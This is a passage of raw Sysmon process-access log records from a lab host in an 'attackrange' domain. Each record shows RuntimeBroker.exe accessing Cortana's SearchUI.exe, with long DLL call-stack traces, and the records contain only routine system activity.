:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246128C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246128C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246116C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246116C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246072C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
